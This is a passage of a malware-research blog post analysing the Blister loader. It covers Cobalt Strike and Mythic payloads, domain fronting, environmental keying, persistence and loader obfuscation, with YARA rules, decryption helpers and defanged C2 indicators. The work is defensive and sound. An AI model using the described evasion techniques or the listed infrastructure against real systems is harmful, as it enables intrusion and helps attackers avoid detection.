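    ).encode()

# The wire destination is the reputable fronted domain...
connect_to = "admin.reddit.com"
# ...but it never appears inside the HTTP request itself:
req = fronted_request("backend.int.global.prod.fastly.net")
assert connect_to.encode() not in req
assert b"Host: backend.int.global.prod.fastly.net" in req
```

This is why network defenders inspecting only DNS or TLS SNI would see admin.reddit[.]com, while the CDN routes on the Host header instead.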

Obfuscated shellcode

In five cases, we observed Blister drop Cobalt Strike by first loading obfuscated shellcode. We included a YARA rule for this particular shellcode in the Appendix.

Performing a retrohunt on VirusTotal yielded only 12 samples, with names indicating potential test files and at least one sample dropping Cobalt Strike. We are unsure whether this is an obfuscator solely used by Evil Corp or whether it is used by other threat actors as well.

Figure 2, Layout of particular shellcode, with denoted steps.

The shellcode is fairly simple; we provide an overview of it in Figure 2. The entrypoint is at the start of the buffer, which calls into the decoding stub. This call instruction automatically pushes the next instruction’s address onto the stack, which the decoding stub uses as a starting point to mutate memory. Figure 3 shows some of these instructions, which are quite distinctive.

Figure 3, Decoding instructions observed in particular shellcode.

At the end of the decoding stub, it either jumps or calls back, and then invokes the decryption function. This decryption function uses RC4, but the S-Box is already initialized, so no key-scheduling algorithm is implemented. Lastly, it jumps to the final payload.
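The decryption step can be sketched in a few lines of Python (illustrative; a real sample's pre-initialized S-Box would be lifted from the shellcode rather than constructed here). Because the key-scheduling step was already baked into the embedded permutation, only RC4's pseudo-random generation algorithm (PRGA) is needed:

```python
def rc4_prga_decrypt(sbox: list, data: bytes) -> bytes:
    """RC4 without key scheduling: the 256-byte permutation `sbox` is
    taken as-is (as embedded in the shellcode) and only the PRGA runs."""
    S = list(sbox)  # work on a copy; each decryption restarts from the embedded state
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# Toy S-Box standing in for the permutation embedded in the shellcode
toy_sbox = list(range(255, -1, -1))
ct = rc4_prga_decrypt(toy_sbox, b"payload")       # RC4 is symmetric...
assert rc4_prga_decrypt(toy_sbox, ct) == b"payload"  # ...so applying it twice round-trips
```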

BlisterMythic

Matching with what was already reported by Unit 42 [8], Blister recently started using Mythic agents as its payload. Mythic is one of the many red teaming frameworks on GitHub [18]. You can use various agents, which are listed on GitHub as well [19] and can roughly be compared to a Cobalt Strike beacon. It is possible to write your own Mythic agent, as long as you comply with a set of constraints. Thus far, we keep seeing the same Mythic agent, which we discuss in more detail later on. The first sample dropping Mythic agents was uploaded to VirusTotal on July 24th 2023, just days before the initial reports of SocGholish infections leading to Mythic. In Table 4, we provide the C2 information from the observed Mythic agents.

We observed Mythic either as a Portable Executable (PE) or as shellcode. The shellcode seems to be rare and unpacks a PE file which, in our experience, has thus far always resulted in a Mythic agent. We discuss this packer later on as well and provide scripts that help with retrieving the PE file it packs. We refer to this specific Mythic agent as BlisterMythic and to the packer as MythicPacker.

In Table 5, we list the BlisterMythic C2 servers we were able to find. Interestingly, the domains were all registered at DNSPod. We also observed this in the past with Cobalt Strike domains we linked to Evil Corp. Apart from this, we also see similarities in the domain names used, e.g. domains consisting of two or three words concatenated to each other and using com as top-level domain (TLD).

Test payloads

Besides red team tooling like Mythic and Cobalt Strike, we also observed Putty and a test application as payloads. Running Putty through Blister does not seem logical and is likely linked to testing. It would only result in Putty not touching the disk and running in memory, which in itself is not useful. Additionally, when we look at the domain hashes in the Blister samples, only the Putty and test application samples in some cases share their domain hash.

Blister configurations

We also looked at the configurations of Blister; from these we can, to some extent, derive how attackers use it. Note that the collection also contains “test samples” from the attacker: except for the more obvious Putty and test application, some samples that dropped Mythic, for instance, could also be linked to testing. We chose to leave out samples that drop Putty or the test application, leaving 97 samples in total. This means that the samples paint a partly biased picture, though we think it is still valuable and provides a view into how Blister is used.

Environmental keying

Since its update in 2022, Blister includes an optional domain hash, which it computes over the DNS search domain of the machine (ComputerNameDnsDomain). It only continues executing if the hash matches its configuration, enabling environmental keying.

By looking at the number of samples that have domain hash verification enabled, we can say something about how Blister is deployed. From the 66 Blister samples, only 6 did not have domain hash verification enabled. This indicates it is mostly used in a targeted manner, corresponding with, for example, using SocGholish for initial access and reconnaissance and then deploying Blister.
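The gating logic can be sketched as follows. This is a minimal illustration only: the hash algorithm shown (32-bit FNV-1a) is a stand-in placeholder, not Blister's actual algorithm, and the domain names are invented for the example.

```python
def fnv1a32(data: bytes) -> int:
    """32-bit FNV-1a; a stand-in hash, NOT Blister's actual algorithm."""
    h = 0x811C9DC5
    for b in data:
        h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
    return h

def should_continue(config_hash: int, dns_search_domain: str) -> bool:
    """Gate execution on the machine's DNS search domain, mirroring how
    Blister compares a hash of ComputerNameDnsDomain to its config."""
    return config_hash == fnv1a32(dns_search_domain.lower().encode())

# A keyed sample only detonates inside the targeted environment:
target_hash = fnv1a32(b"corp.victim.example")
assert should_continue(target_hash, "CORP.VICTIM.EXAMPLE")
assert not should_continue(target_hash, "lab.analysis.example")
```

The practical effect, as the sample counts above suggest, is that sandboxes and analyst machines outside the targeted domain see a loader that exits without ever exposing its payload.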

Persistence

Of the 97 samples, 70 have persistence enabled. For persistence, Blister still uses the same method as described by Elastic Security [20]. It mostly uses the IFileOperation COM interface to copy rundll32.exe and itself to the Startup folder. This is significant for detection, as it means that these operations are performed by the DllHost.exe process, not the rundll32.exe process that hosts Blister.
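Given this persistence mechanism, one simple hunting heuristic is to look for a copy of rundll32.exe in a user's Startup folder, where the genuine System32 binary has no reason to live. A hedged sketch (our own illustration, not an official detection; in practice you would enumerate every user profile):

```python
from pathlib import Path

def suspicious_startup_copies(startup_dir: str) -> list:
    """Return paths of rundll32.exe copies found in a Startup folder;
    the genuine binary lives in System32, so any hit here is suspect."""
    return [
        str(p)
        for p in Path(startup_dir).glob("*.exe")
        if p.name.lower() == "rundll32.exe"
    ]

# Typical per-user location (assumed path, expand per user profile):
# %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
```

Because the copy is performed via IFileOperation, correlating the file creation with DllHost.exe rather than the Blister-hosting rundll32.exe process is the stronger behavioural signal.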

Blister trying new things

Blister’s previous update altered the core payload; however, the loader that is injected into the legitimate executable remained unchanged. In August this year, we observed experimental samples on VirusTotal with an obfuscated loader component, hinting at developer activity. Interestingly, we could link these samples to another sample on VirusTotal which solely contained the function body of the loader, and another sample that contained a loader with a large set of INT 3 instructions added to it. Perhaps the developer was experimenting with different mutations to see how they influence the detection rate.

Obfuscating the first stage

Recent samples from September 2023 have the loader obfuscated in the same manner, with bogus instructions and excessive jump instructions. These changes make it harder to detect Blister using YARA, as the loader instructions are now intertwined with junk instructions and are sometimes followed by junk data due to the added jump instructions.

Figure 4, Comparison of two loader components from recent Blister samples, left is without obfuscation and right is with obfuscation.

In Figure 4, we compare two function bodies of the loader: one as normally seen in Blister samples and one obfuscated function body, observed in the recent samples. The comparison shows that naïve YARA rules are less likely to trigger on the obfuscated function body. In the Appendix, we provide a Blister rule that tries to detect these obfuscated samples. The added bogus instructions include btc, bts, lahf and cqo, instructions we have also observed in the Blister core before; see, for example, the core component of SHA256 4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4.

Dropping Mythic agents

Apart from an obfuscated loader, Mythic agents are currently the payload of choice. In September and October, we found obfuscated Blister samples dropping only Mythic. Certain samples have low or zero detections on VirusTotal [21] at the time of writing, showing that obfuscation does pay off.

We now discuss one sample [22] that drops shellcode that eventually executes a Mythic agent. The shellcode unpacks a PE file and executes it. We provide a YARA rule for this packer, which we refer to as MythicPacker, in the Appendix. Based on this rule, we did not find other samples, suggesting it is a custom packer. Until now, we have only seen this packer unpacking Mythic agents.

The dropped Mythic agents are all similar, and thus far we cannot link them to any public agents. This could mean that the Blister developers created their own Mythic agent, though this is uncertain. We provide a YARA rule that matches on all agents we encountered; a VirusTotal retrohunt over the past year resulted in only four samples, all linked to Blister. We therefore think this Mythic agent is likely custom-made.

Figure 5, BlisterMythic configuration decryption.

The agents all share a similar structure, namely an encrypted configuration in the .bss section of the executable. The configuration is decrypted by XORing the size of the configuration with a constant that appears to differ per sample. For PE files, we have a Python script that can decrypt a configuration. Figure 5 shows this decryption loop, where the XOR constant is 0x48E12000.

Figure 6, Decrypted BlisterMythic configuration

Dumping the configuration results in a binary blob that contains various information, including the C2 server. Figure 6 shows a hexdump of a snippet from the decrypted configuration. We created a script to dump the decrypted configuration of the BlisterMythic agent in PE format, and also a script that unpacks MythicPacker shellcode and outputs a reconstructed PE file; see https://github.com/fox-it/blister-research.
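Based on our reading of the decryption loop in Figure 5, the scheme can be sketched as XORing each 32-bit little-endian word of the blob with a key derived from the configuration size and the per-sample constant. This is an assumption on our part; the exact key derivation may differ between samples, and the config content below is invented for the round-trip demonstration:

```python
import struct

XOR_CONST = 0x48E12000  # per-sample constant taken from the sample in Figure 5

def decrypt_config(blob: bytes, xor_const: int = XOR_CONST) -> bytes:
    """Sketch of the BlisterMythic config decryption: derive a 32-bit key
    from the blob size XORed with the per-sample constant, then apply it
    to every little-endian dword (our reading of Figure 5)."""
    key = (len(blob) ^ xor_const) & 0xFFFFFFFF
    n = len(blob) // 4
    words = struct.unpack(f"<{n}I", blob[: n * 4])
    out = struct.pack(f"<{n}I", *((w ^ key) for w in words))
    return out + blob[n * 4:]  # trailing bytes (if any) left untouched

# XOR is its own inverse, so a test blob round-trips through the routine:
cfg = b"https://c2.example.invalid\x00\x00"  # hypothetical, dword-aligned content
assert decrypt_config(decrypt_config(cfg)) == cfg
```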

Conclusion

In this post, we provided an overview of observed Blister payloads from the past one and a half years on VirusTotal and also gave insight into recent developments. Furthermore, we provided scripts and YARA rules to help analyze Blister and the Mythic agent it drops.

From the analyzed payloads, we see that Cobalt Strike was the favored choice, but that lately it has been replaced by Mythic. Cobalt Strike was mostly dropped as shellcode, and briefly run through obfuscated shellcode or a DLL stager. Apart from Cobalt Strike and Mythic, we saw that Blister test samples are uploaded to VirusTotal as well.

The custom Mythic agent, together with the obfuscated loader, represents the new Blister developments of the past months. It is likely that its developers were aware that the loader component was still a weak spot in terms of static detection. Additionally, throughout the years, Cobalt Strike has received a lot of attention from the security community, with config dumpers and C2 feeds readily available. Mythic is not as popular and allows you to write your own agent, making it an appropriate replacement for now.

References

  1. https://github.com/fox-it/blister-research
  2. https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions
  3. https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/
  4. https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign
  5. https://redcanary.com/blog/intelligence-insights-january-2022/
  6. https://www.trendmicro.com/en_ie/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html
  7. https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader
  8. https://twitter.com/Unit42_Intel/status/1684583246032506880
  9. https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/
  10. https://www.group-ib.com/blog/shadowsyndicate-raas/
  11. https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html
  12. https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
  13. https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf
  14. https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/
  15. https://github.com/Tylous/SourcePoint
  16. https://github.com/threatexpress/random_c2_profile
  17. https://twitter.com/Unit42_Intel/status/1684583246032506880
  18. https://github.com/its-a-feature/Mythic
  19. https://mythicmeta.github.io/overview/
  20. https://www.elastic.co/security-labs/blister-loader
  21. https://www.virustotal.com/gui/file/a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888ac
  22. https://www.virustotal.com/gui/file/f58de1733e819ea38bce21b60bb7c867e06edb8d4fd987ab09ecdbf7f6a319b9

Appendix

YARA rules

rule shellcode_obfuscator
{
    meta:
        os = "Windows"
        arch = "x86-64"
        description = "Detects shellcode packed with unknown obfuscator observed in Blister samples."
        reference_sample = "178ffbdd0876b99ad1c2d2097d9cf776eca56b540a36c8826b400cd9d5514566"
    strings:
        $rol_ror = { 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? }
        $mov_rol_mov = { 4d ?? ?? ?? 49 c1 ?? ?? ?? 4d ?? ?? ?? }
        $jmp = { 49 81 ?? ?? ?? ?? ?? 41 ?? }
    condition:
        #rol_ror > 60 and $jmp and filesize < 2MB and #mov_rol_mov > 60
}
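For quick triage outside YARA, the wildcard hex patterns in the rule above can be approximated with byte regexes. The snippet below is a minimal sketch (not part of the rule set) that counts the $rol_ror pattern the way YARA's #rol_ror counter does and applies the same > 60 threshold; note that re.findall counts non-overlapping matches, so it only approximates YARA's occurrence count.

```python
import re

# Wildcard hex pattern { 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? }
# translated to a bytes regex: each "??" becomes ".", with DOTALL so "." matches any byte.
ROL_ROR = re.compile(rb"\x48\xc1...\x48\xc1...\x48\xc1...", re.DOTALL)

def count_rol_ror(data: bytes) -> int:
    """Count non-overlapping occurrences, approximating YARA's #rol_ror counter."""
    return len(ROL_ROR.findall(data))

def looks_obfuscated(data: bytes, threshold: int = 60) -> bool:
    # Mirrors the '#rol_ror > 60' part of the rule's condition.
    return count_rol_ror(data) > threshold
```

The same translation works for the $mov_rol_mov and $jmp patterns if a full stand-alone checker is needed.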

import "pe"
import "math"

rule blister_x64_windows_loader {
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "Blister"
        description = "Detects Blister loader component injected into legitimate executables."
        reference_sample = "343728792ed1e40173f1e9c5f3af894feacd470a9cdc72e4f62c0dc9cbf63fc1, 8d53dc0857fa634414f84ad06d18092dedeb110689a08426f08cb1894c2212d4, a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888ac"
    strings:
        // 65 48 8B 04 25 60 00 00 00                          mov     rax, gs:60h
        $inst_1 = {65 48 8B 04 25 60 00 00 00}
        // 48 8D 87 44 6D 00 00                                lea     rax, [rdi+6D44h]
        $inst_2 = {48 8D 87 44 6D 00 00}
        // 44 69 C8 95 E9 D1 5B                                imul    r9d, eax, 5BD1E995h
        $inst_3 = {44 ?? ?? 95 E9 D1 5B}
        // 41 81 F9 94 85 09 64                                cmp     r9d, 64098594h
        $inst_4 = {41 ?? ?? 94 85 09 64}
        // B8 FF FF FF 7F                                      mov     eax, 7FFFFFFFh
        $inst_5 = {B8 FF FF FF 7F}
        // 48 8D 4D 48                                         lea     rcx, [rbp+48h]
        $inst_6 = {48 8D 4D 48}
    condition:
        uint16(0) == 0x5A4D and
        all of ($inst_*) and
        pe.number_of_resources > 0 and
        for any i in (0..pe.number_of_resources - 1):
            ( (math.entropy(pe.resources[i].offset, pe.resources[i].length) > 6) and
                pe.resources[i].length > 200000 
            )
}
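The resource check in the condition above relies on YARA's math.entropy, which computes Shannon entropy in bits per byte over a byte range. Below is a self-contained sketch of the equivalent calculation, useful for reproducing the "entropy above 6 and size above 200000" check on an extracted resource outside YARA.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0-8.0), as YARA's math.entropy computes."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def resource_matches(data: bytes) -> bool:
    # Mirrors the rule's per-resource condition: entropy > 6 and length > 200000.
    return shannon_entropy(data) > 6 and len(data) > 200000
```

Compressed or encrypted payload resources typically score close to 8 bits per byte, which is why a threshold of 6 reliably separates them from ordinary resources such as icons or manifests.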

rule blister_mythic_payload {
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "BlisterMythic"
        description = "Detects specific Mythic agent dropped by Blister."
        reference_samples = "2fd38f6329b9b2c5e0379a445e81ece43fe0372dec260c1a17eefba6df9ffd55, 3d2499e5c9b46f1f144cfbbd4a2c8ca50a3c109496a936550cbb463edf08cd79, ab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b, f89cfbc1d984d01c57dd1c3e8c92c7debc2beb5a2a43c1df028269a843525a38"
    strings:
        $start_inst = { 48 83 EC 28 B? [4-8] E8 ?? ?? 00 00 }
        $for_inst = { 48 2B C8 0F 1F 00 C6 04 01 00 48 2D 00 10 00 00 }
    condition:
        all of them
}

rule mythic_packer
{
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "MythicPacker"
        description = "Detects specific PE packer dropped by Blister."
        reference_samples = "9a08d2db7d0bd7d4251533551d4def0f5ee52e67dff13a2924191c8258573024, 759ac6e54801e7171de39e637b9bb525198057c51c1634b09450b64e8ef47255"
    strings:
        // 41 81 38 72 47 65 74        cmp     dword ptr [r8], 74654772h
        $a = { 41 ?? ?? 72 47 65 74 }
        // 41 81 38 72 4C 6F 61        cmp     dword ptr [r8], 616F4C72h
        $b = { 41 ?? ?? 72 4C 6F 61 }
        // B8 01 00 00 00              mov     eax, 1
        // C3                          retn
        $c = { B8 01 00 00 00 C3 }
    condition:
        all of them and uint8(0) == 0x48
}
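The $a and $b strings match cmp instructions against the dword immediates 74654772h and 616F4C72h. Because x86 stores immediates little-endian, these correspond to the byte sequences "rGet" and "rLoa", which appear to be checked when the packer resolves API imports by comparing export-name bytes by hand. A quick sanity check for such constants (a sketch, not part of the rule set):

```python
import struct

def dword_to_ascii(value: int) -> bytes:
    """Render an x86 dword immediate as the bytes it compares against in memory.

    x86 stores immediates little-endian, so `cmp dword ptr [r8], 74654772h`
    tests whether [r8] points at the four bytes b"rGet".
    """
    return struct.pack("<I", value)
```

For example, dword_to_ascii(0x74654772) yields b"rGet" and dword_to_ascii(0x616F4C72) yields b"rLoa".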

Blister payloads listing

First seen | Version | Payload family | Payload type | Environmental keying | Persistence
2021-12-03 | 1 | Cobalt Strike | shellcode | N/a | 0
2021-12-05 | 1 | Cobalt Strike | shellcode | N/a | 0
2021-12-14 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-01-10 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-01-11 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-01-19 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-01-19 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-01-31 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-02-14 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-02-17 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-02-22 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-02-26 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-03-10 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-03-14 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-03-15 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-03-15 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-03-18 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-03-18 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-03-24 | 1 | Putty | exe | N/a | 0
2022-03-24 | 1 | Putty | exe | N/a | 0
2022-03-30 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-04-01 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-04-11 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-04-22 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-04-25 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-06-01 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-06-02 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-06-14 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-07-04 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-07-19 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-07-21 | 1 | Cobalt Strike | shellcode | N/a | 0
2022-08-05 | 1 | Cobalt Strike | shellcode | N/a | 1
2022-08-29 | 2 | Cobalt Strike | shellcode | 0 | 1
2022-09-02 | 2 | Cobalt Strike | shellcode | 0 | 0
2022-09-29 | 2 | Cobalt Strike | shellcode | 1 | 0
2022-10-18 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-18 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-18 | 2 | Cobalt Strike | shellcode | 1 | 0
2022-10-18 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-21 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-21 | 2 | Cobalt Strike | shellcode | 1 | 0
2022-10-24 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-26 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-26 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-10-28 | 2 | Cobalt Strike | shellcode | 1 | 0
2022-10-31 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-02 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-03 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-07 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-08 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-17 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-22 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-11-30 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-12-01 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-12-01 | 2 | Cobalt Strike | shellcode | 1 | 0
2022-12-01 | 2 | Cobalt Strike | shellcode | 1 | 0
2022-12-02 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-12-05 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-12-12 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-12-13 | 2 | Cobalt Strike | shellcode | 1 | 1
2022-12-23 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-01-06 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-01-16 | 2 | Cobalt Strike obfuscated shellcode | shellcode | 1 | 1
2023-01-16 | 2 | Cobalt Strike obfuscated shellcode | shellcode | 1 | 1
2023-01-16 | 2 | Cobalt Strike obfuscated shellcode | shellcode | 1 | 1
2023-01-17 | 2 | Cobalt Strike | shellcode | 0 | 1
2023-01-17 | 2 | Cobalt Strike obfuscated shellcode | shellcode | 1 | 1
2023-01-20 | 2 | Cobalt Strike obfuscated shellcode | shellcode | 1 | 1
2023-01-20 | 2 | Cobalt Strike obfuscated shellcode | shellcode | 1 | 1
2023-01-24 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-01-26 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-01-26 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-02-02 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-02-02 | 2 | Test application | shellcode | 1 | 0
2023-02-02 | 2 | Test application | shellcode | 1 | 0
2023-02-02 | 2 | Putty | exe | 1 | 0
2023-02-02 | 2 | Test application | shellcode | 1 | 0
2023-02-15 | 2 | Putty | exe | 1 | 0
2023-02-15 | 2 | Test application | shellcode | 1 | 0
2023-02-15 | 2 | Putty | exe | 1 | 0
2023-02-15 | 2 | Test application | shellcode | 1 | 0
2023-02-17 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-02-27 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-02-28 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-03-06 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-03-06 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-03-06 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-03-15 | 2 | Cobalt Strike stager | exe | 1 | 0
2023-03-19 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-03-23 | 1 | Cobalt Strike | shellcode | N/a | 1
2023-03-28 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-03-28 | 2 | Cobalt Strike stager | exe | 1 | 0
2023-04-03 | 2 | Cobalt Strike stager | exe | 1 | 1
2023-05-25 | 2 | Cobalt Strike stager | exe | 0 | 1
2023-05-26 | 2 | Cobalt Strike | shellcode | 1 | 1
2023-06-11 | 2 | Test application | shellcode | 1 | 0
2023-06-11 | 2 | Putty | exe | 1 | 0
2023-06-11 | 2 | Putty | exe | 1 | 0
2023-07-24 | 2 | BlisterMythic | exe | 1 | 1
2023-07-27 | 2 | BlisterMythic | exe | 1 | 1
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-09 | 2 | Test application | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-10 | 2 | Putty | shellcode | 1 | 0
2023-08-11 | 2 | BlisterMythic | exe | 1 | 0
2023-08-15 | 2 | Test application | shellcode | 1 | 0
2023-08-17 | 2 | BlisterMythic | exe | 1 | 1
2023-08-18 | 2 | MythicPacker | shellcode | 1 | 0
2023-09-05 | 2 | MythicPacker | shellcode | 0 | 0
2023-09-05 | 2 | MythicPacker | shellcode | 0 | 1
2023-09-08 | 2 | Test application | shellcode | 1 | 0
2023-09-08 | 2 | Test application | shellcode | 1 | 0
2023-09-08 | 2 | Test application | shellcode | 1 | 0
2023-09-08 | 2 | Putty | shellcode | 1 | 0
2023-09-08 | 2 | Putty | shellcode | 1 | 0
2023-09-08 | 2 | Test application | shellcode | 1 | 0
2023-09-19 | 2 | BlisterMythic | exe | 1 | 1
2023-09-21 | 2 | MythicPacker | shellcode | 1 | 0
2023-09-21 | 2 | MythicPacker | shellcode | 1 | 0
2023-10-03 | 2 | MythicPacker | shellcode | 1 | 0
2023-10-10 | 2 | MythicPacker | shellcode | 1 | 0
Table 2, Information on unpacked Blister samples.

Cobalt Strike beacons

Watermark | Domain | URI
1101991775 | albertonne[.]com | /safebrowsing/d4alBmGBO/HafYg4QZaRhMBwuLAjVmSPc
1101991775 | astradamus[.]com | /Collect/union/QXMY8BHNIPH7
1101991775 | backend.int.global.prod.fastly[.]net | /Detect/devs/NJYO2MUY4V
1101991775 | cclastnews[.]com | /safebrowsing/d4alBmGBO/UaIzXMVGvV3tS2OJiKxSzyzbh4u1
1101991775 | cdp-chebe6efcxhvd0an.z01.azurefd[.]net | /Detect/devs/NJYO2MUY4V
1101991775 | deep-linking[.]com | /safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775 | deep-linking[.]com | /safebrowsing/fDeBjO/dMfdNUdgjjii3Ccalh10Mh4qyAFw5mS
1101991775 | deep-linking[.]com | /safebrowsing/fDeBjO/vnZNyQrwUjndCPsCUXSaI
1101991775 | diggin-fzbvcfcyagemchbq.z01.azurefd[.]net | /restore/how/3RG4G5T87
1101991775 | edubosi[.]com | /safebrowsing/bsaGbO6l/ybGoI3wmK2uF9w9aL5qKmnS8IZIWsJqhp
1101991775 | e-sistem[.]com | /Detect/devs/NJYO2MUY4V
1101991775 | ewebsofts[.]com | /safebrowsing/3Tqo/UMskN3Lh0LyLy8BfpG1Bsvp
1101991775 | expreshon[.]com | /safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775 | eymenelektronik[.]com | /safebrowsing/dfKa/B58qAhJ0AEF7aNwauoqpAL8
1101991775 | gotoknysna.com.global.prod.fastly[.]net | /safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775 | henzy-h6hxfpfhcaguhyf5.z01.azurefd[.]net | /Detect/devs/NJYO2MUY4V
1101991775 | lepont-edu[.]com | /safebrowsing/dfKa/9T1BuXpqEDg9tx53mQRU6
1101991775 | lindecolas[.]com | /safebrowsing/d4alBmGBO/UaIzXMVGvV3tS2OJiKxSzyzbh4u1
1101991775 | lodhaamarathane[.]com | /safebrowsing/dfKa/9T1BuXpqEDg9tx53mQRU6
1101991775 | mail-adv[.]com | /safebrowsing/bsaGbO6l/dl1sskHxt1uGDGUnLDB5gxn4vYZQK1kaG6
1101991775 | mainecottagebythesea[.]com | /functionalStatus/cjdl-CLe4j-XHyiEaDqQx
1101991775 | onscenephotos[.]com | /restore/how/3RG4G5T87
1101991775 | promedia-usa[.]com | /safebrowsing/d4alBmGBO/HafYg4QZaRhMBwuLAjVmSPc
1101991775 | python.docs.global.prod.fastly[.]net | /Collect/union/QXMY8BHNIPH7
1101991775 | realitygangnetwork[.]com | /functionalStatus/qPprp9dtVhrGV3R3re5Xy4M2cfQo4wB
1101991775 | realitygangnetwork[.]com | /functionalStatus/vFi8EPnc9zJTD0GgRPxggCQAaNb
1101991775 | sanfranciscowoodshop[.]com | /safebrowsing/dfKa/GgVYon5zhYu5L7inFbl1MZEv7RGOnsS00b
1101991775 | sohopf[.]com | /apply/admin_/99ZSSAHDH
1101991775 | spanish-home-sales[.]com | /safebrowsing/d4alBmGBO/EB-9sfMPmsHmH-A7pmll9HbV0g
